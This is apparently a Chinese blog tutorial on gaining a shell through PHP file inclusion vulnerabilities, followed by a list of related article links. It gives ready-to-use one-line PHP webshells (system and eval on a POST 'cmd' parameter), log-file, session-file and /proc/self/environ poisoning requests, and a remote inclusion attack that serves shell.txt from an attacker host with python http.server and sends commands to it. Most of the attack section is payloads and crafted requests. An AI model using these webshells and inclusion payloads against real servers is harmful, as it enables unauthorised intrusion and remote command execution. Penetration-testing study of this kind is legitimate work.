利用文件包含GetShell

Z1eaf_complete2026-03-16 9:45

一、本地文件包含getshell

1-日志文件

原理 :当我们访问目标网站时,我们的访问请求会被记录在日志文件中(access.logerror.log),我们可以在访问路径拼接恶意代码,配合文件包含漏洞解析执行恶意代码
条件:需要知道日志文件的位置和名称

(1)注入恶意代码

通过一个特制的HTTP请求,将恶意代码(PHP Webshell)注入到服务器日志文件中。我们可以在URLUser-Agent字段中写入WebShell

php 复制代码 
<?php @system($_POST['cmd']);?>

我们就插入到URL中,这里我们需要用burpsuite抓包插入,因为直接在浏览器中插入,代码会被URL编码

(2)包含日志文件

利用本地文件包含漏洞,通过文件包含参数(如file)包含日志文件

复制代码 
http://php/include.php?file=E:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1773532800

当服务器执行这个请求的时候,它会把日志文件的内容当作php代码来执行,从而执行我们注入的命令whoami

复制代码 
http://php/include.php?file=E:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1773532800&cmd=whoami

2-session文件

原理 :某些Web应用程序会将用户的Session信息保存在某些服务器的tmp目录下,文件命名通常为sess_PHPSESSID。如果攻击者可以控制Session数据,就能通过LFI包含该文件getshell
条件

  1. 知道Session存储路径
  2. 能够控制Session数据,特别是变量名
  3. Session存储路径可访问(常见路径如/var/lib/php/sessions//tmp/等)。

(1)设置Session值

通过$_SESSION变量,将恶意代码注入到Session中。这通常需要先找到一个可以控制Session值的参数,例如在登录或注册时

复制代码 
$_SESSION['username']="<?php eval($_POST['cmd']);?>";

(2)获取文件路径

通常Session的命名为sess_加上Session ID。看通过浏览器Cookies中的PHPSESSID来获取 ,然后将文件包含

复制代码 
http://example.com/index.pph?file=../../../../emp/sess_aadadaw212eda2131da13123

(3)执行恶意代码

当LFI漏洞包含该Session文件时,恶意代码被执行

3-/proc/self/environ

在Linux系统中,/proc/self/environ文件存储了当前进程的环境变量。攻击者可以通过设置User-Agent等环境变量,将恶意代码注入到该文件中,利用LFI漏洞包含

(1)设置User-Agent

发送一个带有恶意User-Agent的请求

复制代码 
GET /index.php?page=test.php
HTTP/1.1
Host:example.com
User-Agent: <?php @system('whoami');?>

(2)包含环境变量文件

复制代码 
http://example.com/index.php?file=../../../../proc/self/environ

(3)执行命令

当LFI漏洞包含该文件时,恶意代码被执行

二、远程文件包含getshell

RFI通常LFI更容易利用,因为它允许攻击者直接从自己的服务器上包含并执行恶意文件

(1)制作Webshell文件

在攻击者自己的服务器上创建一个Webshell文件,例如:

php 复制代码 
<?php @system($_POST['cmd']);?>

为了绕过一些过滤,文件名可以不使用.php后最,例如:shell.txtshell.jpg

(2)启动HTTP服务

在攻击者的服务器上开启有一个简单的HTTP服务来托管shell.txt

复制代码 
python -m http.server 80

(3)远程文件包含

利用RFI漏洞,将URL指向攻击者服务器,包含shell.txt

复制代码 
http://example.com/index.php?file=http://attacker-ip/shell.txt

注意:为了防止服务器对URL过滤,有时候需要使用编码、伪协议等技巧绕过

(4)执行命令

如果成功,shell.txt中的Webshell代码已经被执行,可以使用工具或直接在URL中POST数据来执行命令

复制代码 
POST /index.php?file=http://attacker-ip/shell.txt HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

cmd=ls -al
相关推荐
0xSec笔记本挖呀瓦呀挖2 小时前
OpenClawWeComzh 实战:安卓 APK 分析与手机取证全自动化基础玩法
android·web安全·网络安全·智能手机·自动化·取证·电子数据取证
海兰2 小时前
OpenClaw安全保命指南:Skill 插件投毒风险全解析及应对措施
人工智能·安全·agent·openclaw
学习3人组3 小时前
PowerShell 执行策略限制导致的 `npm` 命令无法运行的安全错误
前端·安全·npm
CDN3603 小时前
中小站安全方案|360高防服务器+CDN搭配使用,防护效果翻倍
运维·服务器·安全
xixixi777773 小时前
从图灵测试到大模型:人工智能的演进之路(最近open claw及重看流浪地球有感)
安全·ai·大模型·模型·通信
mCell11 小时前
关于 Openclaw,最近的一点思考。
人工智能·安全·aigc
MaximusCoder13 小时前
等保测评命令——Anolis Linux
linux·运维·服务器·网络·经验分享·安全·php
牢七14 小时前
百家cms 黑盒测试
安全·web安全
daopuyun15 小时前
技术最前沿|最新版软件安全测试工具Fortify 安全规则库26.1更新内容
测试工具·安全
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04OpenClaw macOS 完整安装与本地模型配置教程(实战版)05UV安装并设置国内源06本地部署 OpenClaw + DeepSeek-R1 完全指南07Openclow安装保姆级教程08OpenClaw 飞书机器人不回复消息?3 小时踩坑总结09OpenClaw Control UI安全上下文访问配置10在 Windows 上配置 Claude Code从安装到解决网络问题